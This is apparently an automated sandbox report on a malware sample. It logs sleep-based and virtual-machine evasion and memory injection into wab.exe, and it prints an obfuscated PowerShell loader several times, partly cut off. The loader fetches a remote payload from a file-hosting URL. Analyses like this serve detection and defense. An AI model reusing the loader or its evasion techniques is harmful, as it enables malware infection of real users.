            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22240000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22400000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 24400000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5536Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4388Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7375Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2318Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3806Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4054Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep count: 7375 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep count: 2318 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6164Thread sleep count: 3806 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6164Thread sleep count: 4054 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -99859s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -99734s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -99625s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -99516s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -99391s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -99276s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -99172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -99063s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -98938s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -98813s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -98703s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -98593s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -98484s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -98375s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -98266s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -98141s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -98029s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -97922s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -97813s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -97688s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -97563s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -97453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -97344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -97219s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -97110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -96985s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -96862s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -96735s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -96610s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -96485s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -96360s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -96235s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -96110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -95985s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -95860s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -95735s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -95610s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -95464s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99859Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99625Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99516Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99391Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99276Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99063Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98938Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98703Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98593Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98484Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98375Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98266Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98141Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98029Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96862Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95464Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wab.exe, 00000009.00000002.2928711448.0000000006AC8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928711448.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2106027892.0000000006B2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000001.00000002.2329475776.000001D971C5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla.(
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078D0638 LdrInitializeThunk,4_2_078D0638
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29CFA44Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean 